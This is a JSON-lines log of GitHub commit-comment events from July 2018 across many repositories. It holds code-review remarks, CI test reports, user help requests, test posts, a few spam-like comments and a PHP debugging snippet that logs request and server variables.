{"id":"7931726124","type":"CommitCommentEvent","actor":{"login":"dwilkie"},"repo":{"name":"somleng/somleng-scfm"},"payload":{"comment":{"id":29628273,"position":null,"line":null,"path":null,"commit_id":"c76b9421bab7c527ffa8abe50d47e22d7c7dea49","created_at":"2018-07-07T04:13:46Z","updated_at":"2018-07-07T04:13:46Z","author_association":"COLLABORATOR","body":"__API Description file syntax error on line 3__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2018-07-07T04:13:46Z"}
{"id":"7931726930","type":"CommitCommentEvent","actor":{"login":"seisman"},"repo":{"name":"GenericMappingTools/gmt-python"},"payload":{"comment":{"id":29628274,"position":4,"line":21,"path":"doc/conf.py","commit_id":"98ca37c5d897f886b8b73382ec8c6ed5cf0d2bb3","created_at":"2018-07-07T04:14:38Z","updated_at":"2018-07-07T04:14:38Z","author_association":"MEMBER","body":"Why is the intersphinx extension removed?"}},"created_at":"2018-07-07T04:14:38Z"}
{"id":"7931733645","type":"CommitCommentEvent","actor":{"login":"nirvn"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":29628285,"position":null,"line":null,"path":null,"commit_id":"5c855b417f62a686080738db69053a7dcb159ceb","created_at":"2018-07-07T04:22:06Z","updated_at":"2018-07-07T04:22:06Z","author_association":"CONTRIBUTOR","body":"@m-kuhn , before I forget: we need to backport this to 3.2."}},"created_at":"2018-07-07T04:22:06Z"}
{"id":"7931734046","type":"CommitCommentEvent","actor":{"login":"daN4cat"},"repo":{"name":"opensourcepos/opensourcepos"},"payload":{"comment":{"id":29628286,"position":null,"line":null,"path":null,"commit_id":"1026ebb0ebd632ef7a9c660f8c6f59fd448e8f73","created_at":"2018-07-07T04:22:31Z","updated_at":"2018-07-07T04:22:31Z","author_association":"COLLABORATOR","body":"@jekkos ?"}},"created_at":"2018-07-07T04:22:31Z"}
{"id":"7931734367","type":"CommitCommentEvent","actor":{"login":"SkyhighMcAfee"},"repo":{"name":"McAfee-Demo/McAfeeDemoRepo"},"payload":{"comment":{"id":29628287,"position":1,"line":null,"path":"1530937366.08/github_test.txt","commit_id":"08372a3127d1a8ff0600547bc509ba02dbd697ec","created_at":"2018-07-07T04:22:53Z","updated_at":"2018-07-07T04:22:53Z","author_association":"MEMBER","body":"889976543"}},"created_at":"2018-07-07T04:22:53Z"}
{"id":"7931742232","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29628303,"position":null,"line":null,"path":null,"commit_id":"4852e5df34389259e4a314a3da34c46dcb0295e4","created_at":"2018-07-07T04:30:46Z","updated_at":"2018-07-07T04:30:46Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/ip-lookup-goes-off-screen-for-registration-ip-on-mobile/91695/4\n"}},"created_at":"2018-07-07T04:30:46Z"}
{"id":"7931743350","type":"CommitCommentEvent","actor":{"login":"yoshitokamizato"},"repo":{"name":"yoshitokamizato/Rails-Lesson"},"payload":{"comment":{"id":29628305,"position":72,"line":72,"path":"app/assets/stylesheets/rubys.scss","commit_id":"7996f337c1c2bf2f053df33bfe0c2b30a5a32c03","created_at":"2018-07-07T04:31:51Z","updated_at":"2018-07-07T04:31:51Z","author_association":"OWNER","body":"prettyprintでコードを中央寄せにするにはflexを指定するといい"}},"created_at":"2018-07-07T04:31:51Z"}
{"id":"7931743548","type":"CommitCommentEvent","actor":{"login":"nareshkumar2888"},"repo":{"name":"BhuvanaK121/MovieTicketBookingJava"},"payload":{"comment":{"id":29628307,"position":null,"line":null,"path":null,"commit_id":"36964ead0c2bb7e2128d532dbab6e7facf23e8c8","created_at":"2018-07-07T04:32:06Z","updated_at":"2018-07-07T04:32:06Z","author_association":"NONE","body":"thank you Bhuvanak121\r\n"}},"created_at":"2018-07-07T04:32:06Z"}
{"id":"7931745906","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628316,"position":null,"line":null,"path":null,"commit_id":"a72e4454c3031860290fc119785945eb62ec2c9c","created_at":"2018-07-07T04:34:35Z","updated_at":"2018-07-07T04:34:35Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a72e4454c3031860290fc119785945eb62ec2c9c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-07T04:34:35Z"}
{"id":"7931747791","type":"CommitCommentEvent","actor":{"login":"rikimarutsui"},"repo":{"name":"k0staa/stock-rnn"},"payload":{"comment":{"id":29628317,"position":null,"line":null,"path":null,"commit_id":"e3ff4b48618a1d693e87078b4122bda64f981d93","created_at":"2018-07-07T04:36:20Z","updated_at":"2018-07-07T04:36:20Z","author_association":"NONE","body":"May I know how to make xrange to range for Python3?\r\nBecause I have change xrange to range but it also show : \r\nTraceback (most recent call last):\r\n  File \"main.py\", line 111, in <module>\r\n    tf.app.run()\r\n  File \"C:\\ProgramData\\Anaconda3\\envs\\tensorflow\\lib\\site-pa\r\nthon\\platform\\app.py\", line 126, in run\r\n    _sys.exit(main(argv))\r\n  File \"main.py\", line 104, in main\r\n    rnn_model.train(stock_data_list, FLAGS)\r\n  File \"C:\\Users\\Administrator\\Desktop\\stock-rnn-master\\stoc\r\nnn.py\", line 220, in train\r\n    for batch_X, batch_y in d_.generate_one_epoch(config.bat\r\n  File \"C:\\Users\\Administrator\\Desktop\\stock-rnn-master\\stoc\r\ndel.py\", line 65, in generate_one_epoch\r\n    random.shuffle(batch_indices)\r\n  File \"C:\\ProgramData\\Anaconda3\\envs\\tensorflow\\lib\\random.\r\nuffle\r\n    x[i], x[j] = x[j], x[i]\r\nTypeError: 'range' object does not support item assignment"}},"created_at":"2018-07-07T04:36:20Z"}
{"id":"7931751265","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29628323,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-07T04:39:42Z","updated_at":"2018-07-07T04:39:42Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-07T04:39:42Z"}
{"id":"7931752222","type":"CommitCommentEvent","actor":{"login":"Atomic-33"},"repo":{"name":"the-codepunker/ubuntu-nvidia-mining"},"payload":{"comment":{"id":29628325,"position":null,"line":null,"path":null,"commit_id":"ac195588b3b438992824a311ae64f5f2e829926e","created_at":"2018-07-07T04:40:40Z","updated_at":"2018-07-07T04:40:40Z","author_association":"NONE","body":"First and foremost, thank you!! This guide is amazing! I am new to mining and my question is about the setup guide for Ubuntu Nvidia. Will this guide work for me if I'm using Nvidia 1080Ti? "}},"created_at":"2018-07-07T04:40:40Z"}
{"id":"7931753055","type":"CommitCommentEvent","actor":{"login":"purcell"},"repo":{"name":"melpa/melpa"},"payload":{"comment":{"id":29628328,"position":null,"line":null,"path":null,"commit_id":"84a07e1e453cf9c01c78910d46c43f96926544c0","created_at":"2018-07-07T04:41:30Z","updated_at":"2018-07-07T04:41:30Z","author_association":"MEMBER","body":"No problem. :-)"}},"created_at":"2018-07-07T04:41:30Z"}
{"id":"7931754253","type":"CommitCommentEvent","actor":{"login":"pawan17kumar"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29628329,"position":2,"line":2,"path":"depends/patches/qt/fix-xcb-include-order.patch","commit_id":"28482efefb15dc2c273a52b96d1aceb995db4968","created_at":"2018-07-07T04:42:47Z","updated_at":"2018-07-07T04:42:47Z","author_association":"NONE","body":"185T4qJge3NEYy1Jg6YPgNqsme11n5NZh6"}},"created_at":"2018-07-07T04:42:47Z"}
{"id":"7931757398","type":"CommitCommentEvent","actor":{"login":"yoshihashimoto"},"repo":{"name":"yoshihashimoto/sample-repository"},"payload":{"comment":{"id":29628333,"position":null,"line":null,"path":null,"commit_id":"7db60395e6a5ab36c2268ed7b1ac6b5ca877e243","created_at":"2018-07-07T04:46:05Z","updated_at":"2018-07-07T04:46:05Z","author_association":"OWNER","body":"てｓｔ２"}},"created_at":"2018-07-07T04:46:05Z"}
{"id":"7931757963","type":"CommitCommentEvent","actor":{"login":"leouieda"},"repo":{"name":"GenericMappingTools/gmt-python"},"payload":{"comment":{"id":29628335,"position":4,"line":21,"path":"doc/conf.py","commit_id":"98ca37c5d897f886b8b73382ec8c6ed5cf0d2bb3","created_at":"2018-07-07T04:46:43Z","updated_at":"2018-07-07T04:46:43Z","author_association":"MEMBER","body":"Oh, I think I removed it because it was slowing down there build but forgot\nto put it back.\n\nOn Fri, Jul 6, 2018, 18:14 Dongdong Tian <notifications@github.com> wrote:\n\n> Why is the intersphinx extension removed?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/GenericMappingTools/gmt-python/commit/98ca37c5d897f886b8b73382ec8c6ed5cf0d2bb3#commitcomment-29628274>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AARtItrqwaIa6yBXvEZ9Ah9-vFfFij1Pks5uEDWugaJpZM4VGOFh>\n> .\n>\n"}},"created_at":"2018-07-07T04:46:43Z"}
{"id":"7931760632","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628341,"position":null,"line":null,"path":null,"commit_id":"bfb5e7670bf35b0559472163134c37a5363468bd","created_at":"2018-07-07T04:49:41Z","updated_at":"2018-07-07T04:49:41Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2970 of 2972 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\nregression Test Summary\n * Passed: 642\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T04:49:41Z"}
{"id":"7931764074","type":"CommitCommentEvent","actor":{"login":"raidenkangkang"},"repo":{"name":"raidenkangkang/gears-poc"},"payload":{"comment":{"id":29628348,"position":null,"line":null,"path":null,"commit_id":"d1c3cd7d2cf86d6d8a868064dd5c6d35dfa3bdb6","created_at":"2018-07-07T04:53:16Z","updated_at":"2018-07-07T04:53:16Z","author_association":"OWNER","body":"Setup Master Branch"}},"created_at":"2018-07-07T04:53:16Z"}
{"id":"7931765023","type":"CommitCommentEvent","actor":{"login":"raidenkangkang"},"repo":{"name":"raidenkangkang/gears-poc"},"payload":{"comment":{"id":29628352,"position":null,"line":null,"path":null,"commit_id":"d1c3cd7d2cf86d6d8a868064dd5c6d35dfa3bdb6","created_at":"2018-07-07T04:54:13Z","updated_at":"2018-07-07T04:54:13Z","author_association":"OWNER","body":"### **Test for Francis' team**"}},"created_at":"2018-07-07T04:54:13Z"}
{"id":"7931765519","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628353,"position":null,"line":null,"path":null,"commit_id":"bfb5e7670bf35b0559472163134c37a5363468bd","created_at":"2018-07-07T04:54:48Z","updated_at":"2018-07-07T04:54:48Z","author_association":"NONE","body":"#6763-Swimming-pool-flow-not-added-to-plant-loop-sizing (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfb5e7670bf35b0559472163134c37a5363468bd-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T04:54:48Z"}
{"id":"7931765799","type":"CommitCommentEvent","actor":{"login":"sheprs"},"repo":{"name":"dant3/stetho"},"payload":{"comment":{"id":29628354,"position":55,"line":309,"path":"stetho/src/main/java/com/facebook/stetho/inspector/protocol/module/Page.java","commit_id":"9fb7de6fe83826ea8134eb245253cd484a489c2a","created_at":"2018-07-07T04:55:08Z","updated_at":"2018-07-07T04:55:08Z","author_association":"NONE","body":"Paula Herdt-Clemons Meetups \r\n"}},"created_at":"2018-07-07T04:55:08Z"}
{"id":"7931765988","type":"CommitCommentEvent","actor":{"login":"denio-rus"},"repo":{"name":"denio-rus/thinknetica-ruby"},"payload":{"comment":{"id":29628355,"position":null,"line":null,"path":null,"commit_id":"635e1dc2310bd37b4c1593ae49e0ef00b2259fd7","created_at":"2018-07-07T04:55:18Z","updated_at":"2018-07-07T04:55:18Z","author_association":"OWNER","body":"метод train_detalization в модуле Messages"}},"created_at":"2018-07-07T04:55:18Z"}
{"id":"7931766816","type":"CommitCommentEvent","actor":{"login":"sheprs"},"repo":{"name":"dant3/stetho"},"payload":{"comment":{"id":29628356,"position":32,"line":60,"path":"stetho/src/main/java/com/facebook/stetho/inspector/protocol/module/Page.java","commit_id":"9fb7de6fe83826ea8134eb245253cd484a489c2a","created_at":"2018-07-07T04:56:13Z","updated_at":"2018-07-07T04:56:13Z","author_association":"NONE","body":"Meetups "}},"created_at":"2018-07-07T04:56:13Z"}
{"id":"7931767551","type":"CommitCommentEvent","actor":{"login":"sanfrecce-osaka"},"repo":{"name":"fjordllc/bootcamp"},"payload":{"comment":{"id":29628358,"position":6,"line":17,"path":"app/models/report.rb","commit_id":"be5b4e9b0f387ebd13fd3cbf3537aec2271af9c0","created_at":"2018-07-07T04:57:01Z","updated_at":"2018-07-07T04:57:01Z","author_association":"CONTRIBUTOR","body":"インスタンスメソッドから`created_at`等の属性を呼ぶ際は`self.created_at`ではなく`created_at`とselfなしで書けます。\r\nこっちのほうが簡潔で好きです。\r\n参考：[Rails インスタンスメソッド内部でselfを使うべきか](https://qiita.com/shunsuke227ono/items/3b6402ee2b23050542e4)"}},"created_at":"2018-07-07T04:57:01Z"}
{"id":"7931772318","type":"CommitCommentEvent","actor":{"login":"codymcclaneg"},"repo":{"name":"BlackDuckCoPilot/example-gradle-travis"},"payload":{"comment":{"id":29628372,"position":4,"line":3,"path":"README.md","commit_id":"bc16f474f364f518459a88c379d21064574ccbb3","created_at":"2018-07-07T05:01:37Z","updated_at":"2018-07-07T05:01:37Z","author_association":"NONE","body":">\r\n"}},"created_at":"2018-07-07T05:01:37Z"}
{"id":"7931776533","type":"CommitCommentEvent","actor":{"login":"SYAVA125"},"repo":{"name":"SYAVA125/Exercise3"},"payload":{"comment":{"id":29628381,"position":null,"line":null,"path":null,"commit_id":"afd6aae970b5b50fd80019c9e7c185386712f1bc","created_at":"2018-07-07T05:05:47Z","updated_at":"2018-07-07T05:05:47Z","author_association":"OWNER","body":"Won/lost message added"}},"created_at":"2018-07-07T05:05:47Z"}
{"id":"7931780787","type":"CommitCommentEvent","actor":{"login":"btzy"},"repo":{"name":"btzy/circuit-sandbox"},"payload":{"comment":{"id":29628392,"position":155,"line":134,"path":"CircuitSandbox/pencilaction.hpp","commit_id":"c661f4917e9f6d088d87163b0f14892b95d39e71","created_at":"2018-07-07T05:10:10Z","updated_at":"2018-07-07T05:10:10Z","author_association":"OWNER","body":"Fixed with 4a3fe419fdac5e83645ff2bfcf7b59ae84db7761."}},"created_at":"2018-07-07T05:10:10Z"}
{"id":"7931782704","type":"CommitCommentEvent","actor":{"login":"AR98"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29628395,"position":null,"line":null,"path":null,"commit_id":"3d00e8c7bb077adce9445212f785b79d0a906230","created_at":"2018-07-07T05:12:03Z","updated_at":"2018-07-07T05:12:03Z","author_association":"NONE","body":"@mgillieron  according to ur described step of making dimens.xml .....I m stuck with step 4,How to resolve it \r\n![image](https://user-images.githubusercontent.com/35477662/42407058-8bb268de-8169-11e8-9465-ee88c9efae4b.png)\r\nplease help me ."}},"created_at":"2018-07-07T05:12:03Z"}
{"id":"7931787385","type":"CommitCommentEvent","actor":{"login":"seisman"},"repo":{"name":"GenericMappingTools/gmt-python"},"payload":{"comment":{"id":29628405,"position":4,"line":21,"path":"doc/conf.py","commit_id":"98ca37c5d897f886b8b73382ec8c6ed5cf0d2bb3","created_at":"2018-07-07T05:16:32Z","updated_at":"2018-07-07T05:16:32Z","author_association":"MEMBER","body":"I think we should add it back. If it's slow, we can comment it out."}},"created_at":"2018-07-07T05:16:32Z"}
{"id":"7931789835","type":"CommitCommentEvent","actor":{"login":"bash550"},"repo":{"name":"bash550/BeipMU"},"payload":{"comment":{"id":29628417,"position":null,"line":null,"path":null,"commit_id":"195f250c80ffef18401d3cf15fffe2e499af02ee","created_at":"2018-07-07T05:19:01Z","updated_at":"2018-07-07T05:19:01Z","author_association":"OWNER","body":"Testing. WOndering if 8bitmush html tag was done the right way too."}},"created_at":"2018-07-07T05:19:01Z"}
{"id":"7931792953","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29628421,"position":null,"line":null,"path":null,"commit_id":"ea02aa2bd31654f00ef055f77c69fe89623aee44","created_at":"2018-07-07T05:22:00Z","updated_at":"2018-07-07T05:22:00Z","author_association":"NONE","body":"Refactor_UnitarySystem (rraustad) - i386-Windows-7-VisualStudio-14: OK (2934 of 2935 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ea02aa2bd31654f00ef055f77c69fe89623aee44-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T05:22:00Z"}
{"id":"7931801512","type":"CommitCommentEvent","actor":{"login":"Gyrfalcon5"},"repo":{"name":"harrinp/PAT"},"payload":{"comment":{"id":29628460,"position":null,"line":null,"path":null,"commit_id":"100fd461cc0b1ab71c95b2cab1ac98b439274e6e","created_at":"2018-07-07T05:30:24Z","updated_at":"2018-07-07T05:30:24Z","author_association":"COLLABORATOR","body":"This commit and the previous should be the last two to have a somewhat functioning installer for Debian based systems."}},"created_at":"2018-07-07T05:30:24Z"}
{"id":"7931801626","type":"CommitCommentEvent","actor":{"login":"KRodinn"},"repo":{"name":"joye-ramone/na-ogsr"},"payload":{"comment":{"id":29628461,"position":3,"line":50,"path":"gamedata/scripts/se_zones.script","commit_id":"f539efd75133355ab94cab32ecdba15131a8ac6f","created_at":"2018-07-07T05:30:30Z","updated_at":"2018-07-07T05:30:30Z","author_association":"NONE","body":"И ещё, se_zones  я тебе перепишу, наверно. TODO: не забыть."}},"created_at":"2018-07-07T05:30:30Z"}
{"id":"7931805061","type":"CommitCommentEvent","actor":{"login":"keronori"},"repo":{"name":"keronori/IntroductionToDataManagement"},"payload":{"comment":{"id":29628472,"position":null,"line":null,"path":null,"commit_id":"221d39e70eaf798996e4eea557999f0c02f8e6d3","created_at":"2018-07-07T05:33:53Z","updated_at":"2018-07-07T05:33:53Z","author_association":"OWNER","body":"Greetings added"}},"created_at":"2018-07-07T05:33:53Z"}
{"id":"7931805331","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"Canner/canner"},"payload":{"comment":{"id":29628473,"position":null,"line":null,"path":null,"commit_id":"6dc12029c35c16884cf6a73859ad817253cc03a4","created_at":"2018-07-07T05:34:11Z","updated_at":"2018-07-07T05:34:11Z","author_association":"NONE","body":"[``](\r\n\r\n- [ ] url\r\n\r\n)"}},"created_at":"2018-07-07T05:34:11Z"}
{"id":"7931807113","type":"CommitCommentEvent","actor":{"login":"timotheecour"},"repo":{"name":"nim-lang/Nim"},"payload":{"comment":{"id":29628476,"position":null,"line":null,"path":null,"commit_id":"633dcca71bc85690ac7bea09bb452f5132c0f182","created_at":"2018-07-07T05:35:56Z","updated_at":"2018-07-07T05:35:56Z","author_association":"CONTRIBUTOR","body":"see also https://github.com/nim-lang/Nim/issues/8227#issuecomment-403190112"}},"created_at":"2018-07-07T05:35:56Z"}
{"id":"7931807472","type":"CommitCommentEvent","actor":{"login":"Sherkhan1991"},"repo":{"name":"Sherkhan1991/crypto"},"payload":{"comment":{"id":29628477,"position":null,"line":null,"path":null,"commit_id":"48861ce478af07474255f2cfc5fc70e1ee2b549b","created_at":"2018-07-07T05:36:18Z","updated_at":"2018-07-07T05:36:18Z","author_association":"OWNER","body":"### Get Request Response\r\n```\r\n//Get Json encode Request response\r\n\t$test = json_encode($this->request);\r\n//To View Copy paste - http://jsonviewer.stack.hu/\r\n\t$this->log->write(\"POST R 2 \" . $test);\r\n//Recieve header - All other cases failed\r\n\t$test = $this->request->server['HTTP_X_CC_WEBHOOK_SIGNATURE'];\r\n\t$this->log->write(\"POST Header \" . $test);\r\nexit();\r\n```\r\n### Get Server Response\r\n\r\n```\r\n            $indicesServer = array('PHP_SELF',\r\n                'argv',\r\n                'argc',\r\n                'GATEWAY_INTERFACE',\r\n                'SERVER_ADDR',\r\n                'SERVER_NAME',\r\n                'SERVER_SOFTWARE',\r\n                'SERVER_PROTOCOL',\r\n                'REQUEST_METHOD',\r\n                'REQUEST_TIME',\r\n                'REQUEST_TIME_FLOAT',\r\n                'QUERY_STRING',\r\n                'DOCUMENT_ROOT',\r\n                'HTTP_ACCEPT',\r\n                'HTTP_ACCEPT_CHARSET',\r\n                'HTTP_ACCEPT_ENCODING',\r\n                'HTTP_ACCEPT_LANGUAGE',\r\n                'HTTP_CONNECTION',\r\n                'HTTP_HOST',\r\n                'HTTP_REFERER',\r\n                'HTTP_USER_AGENT',\r\n                'HTTPS',\r\n                'REMOTE_ADDR',\r\n                'REMOTE_HOST',\r\n                'REMOTE_PORT',\r\n                'REMOTE_USER',\r\n                'REDIRECT_REMOTE_USER',\r\n                'SCRIPT_FILENAME',\r\n                'SERVER_ADMIN',\r\n                'SERVER_PORT',\r\n                'SERVER_SIGNATURE',\r\n                'PATH_TRANSLATED',\r\n                'SCRIPT_NAME',\r\n                'REQUEST_URI',\r\n                'PHP_AUTH_DIGEST',\r\n                'PHP_AUTH_USER',\r\n                'PHP_AUTH_PW',\r\n                'AUTH_TYPE',\r\n                'PATH_INFO',\r\n                'ORIG_PATH_INFO') ;\r\n\r\nforeach ($indicesServer as $arg) {\r\n    if (isset($_SERVER[$arg])) {\r\n        $this->log->write(\"Server $arg \". $_SERVER[$arg]);\r\n    }\r\n    }\r\n```\r\n**Method Not Works**\r\n```\r\n$this->getRequest()->getHeader()\r\nget_all_headers()\r\n```\r\n"}},"created_at":"2018-07-07T05:36:18Z"}
{"id":"7931808365","type":"CommitCommentEvent","actor":{"login":"rizvigit"},"repo":{"name":"rizvigit/This-is-my-new-repository"},"payload":{"comment":{"id":29628482,"position":1,"line":1,"path":"newfile.txt","commit_id":"ee18d0f9cebf6a67ab4ca037760a8dd2f1be5d16","created_at":"2018-07-07T05:37:11Z","updated_at":"2018-07-07T05:37:11Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-07T05:37:11Z"}
{"id":"7931809011","type":"CommitCommentEvent","actor":{"login":"bash550"},"repo":{"name":"bash550/BeipMU"},"payload":{"comment":{"id":29628483,"position":null,"line":null,"path":null,"commit_id":"e8343b37c9182e2569faa9a89e71ff3dcbf54628","created_at":"2018-07-07T05:37:48Z","updated_at":"2018-07-07T05:37:48Z","author_association":"OWNER","body":"Check to see if 8bitmush html tag is correct."}},"created_at":"2018-07-07T05:37:48Z"}
{"id":"7931809018","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SleepyTrousers/EnderIO"},"payload":{"comment":{"id":29628484,"position":null,"line":null,"path":null,"commit_id":"94f693c4eb9fe485fb838adda19b64dba9264e90","created_at":"2018-07-07T05:37:48Z","updated_at":"2018-07-07T05:37:48Z","author_association":"NONE","body":"Thank you so much :heart:"}},"created_at":"2018-07-07T05:37:48Z"}
{"id":"7931811325","type":"CommitCommentEvent","actor":{"login":"Shriyanshagro"},"repo":{"name":"collective/collective.ifttt"},"payload":{"comment":{"id":29628487,"position":14,"line":14,"path":"src/collective/ifttt/browser/views.py","commit_id":"990c04b55d008a5046af10cbacc32e0f1506ff54","created_at":"2018-07-07T05:40:16Z","updated_at":"2018-07-07T05:40:16Z","author_association":"COLLABORATOR","body":"@datakurre any suggestion on how to add tests for this condition?"}},"created_at":"2018-07-07T05:40:16Z"}
{"id":"7931812268","type":"CommitCommentEvent","actor":{"login":"pankaj9310"},"repo":{"name":"pankaj9310/peatio"},"payload":{"comment":{"id":29628488,"position":null,"line":null,"path":null,"commit_id":"6848ecb0a231e17ea35b2a307d3c610b2f84f34e","created_at":"2018-07-07T05:41:07Z","updated_at":"2018-07-07T05:41:07Z","author_association":"OWNER","body":"I think you issues in dash code. please check your code"}},"created_at":"2018-07-07T05:41:07Z"}
{"id":"7931817420","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"LukeUsher/Cxbx-Reloaded"},"payload":{"comment":{"id":29628502,"position":451,"line":null,"path":"src/devices/I8259.cpp","commit_id":"183327fd345716f4778c0713396339d7394b2c67","created_at":"2018-07-07T05:45:50Z","updated_at":"2018-07-07T05:45:50Z","author_association":"NONE","body":"Duplicate expression"}},"created_at":"2018-07-07T05:45:50Z"}
{"id":"7931817942","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"LukeUsher/Cxbx-Reloaded"},"payload":{"comment":{"id":29628506,"position":455,"line":null,"path":"src/devices/I8259.cpp","commit_id":"183327fd345716f4778c0713396339d7394b2c67","created_at":"2018-07-07T05:46:20Z","updated_at":"2018-07-07T05:46:20Z","author_association":"NONE","body":"Duplicate expression"}},"created_at":"2018-07-07T05:46:20Z"}
{"id":"7931818492","type":"CommitCommentEvent","actor":{"login":"Nozlaf"},"repo":{"name":"NagiosEnterprises/ncpa"},"payload":{"comment":{"id":29628507,"position":null,"line":null,"path":null,"commit_id":"539454ece8b63ca6a9d30498aaa4a30b7ab7d5b4","created_at":"2018-07-07T05:46:53Z","updated_at":"2018-07-07T05:46:53Z","author_association":"CONTRIBUTOR","body":"nice work :)\r\n"}},"created_at":"2018-07-07T05:46:53Z"}
{"id":"7931818896","type":"CommitCommentEvent","actor":{"login":"shaktigoap"},"repo":{"name":"ETHIndia/ETHIndia"},"payload":{"comment":{"id":29628508,"position":8,"line":264,"path":"index.html","commit_id":"414a182b1266944a2560b9f0aed11c02379d0504","created_at":"2018-07-07T05:47:15Z","updated_at":"2018-07-07T05:47:15Z","author_association":"MEMBER","body":"The alt tag is Arjun Bhuptani. We'll need to update this."}},"created_at":"2018-07-07T05:47:15Z"}
{"id":"7931820786","type":"CommitCommentEvent","actor":{"login":"keronori"},"repo":{"name":"keronori/IntroductionToDataManagement"},"payload":{"comment":{"id":29628511,"position":null,"line":null,"path":null,"commit_id":"d40238e051ad1fd0124eea0c12c816eed4da1c64","created_at":"2018-07-07T05:49:00Z","updated_at":"2018-07-07T05:49:00Z","author_association":"OWNER","body":"Greeting added"}},"created_at":"2018-07-07T05:49:00Z"}
{"id":"7931820891","type":"CommitCommentEvent","actor":{"login":"thjnhsoajca"},"repo":{"name":"thjnhsoajca/thjnhsoajca.github.io"},"payload":{"comment":{"id":29628512,"position":null,"line":null,"path":null,"commit_id":"38672253c3d9d20ed985196182022cd06265a76d","created_at":"2018-07-07T05:49:07Z","updated_at":"2018-07-07T05:49:07Z","author_association":"OWNER","body":":)"}},"created_at":"2018-07-07T05:49:07Z"}
{"id":"7931823287","type":"CommitCommentEvent","actor":{"login":"PatrickvL"},"repo":{"name":"LukeUsher/Cxbx-Reloaded"},"payload":{"comment":{"id":29628526,"position":12,"line":null,"path":"src/devices/I8259.cpp","commit_id":"e8906730484d45240c96a4729c5b504f4b33f508","created_at":"2018-07-07T05:51:31Z","updated_at":"2018-07-07T05:51:31Z","author_association":"NONE","body":"Better make this a member of the class"}},"created_at":"2018-07-07T05:51:31Z"}
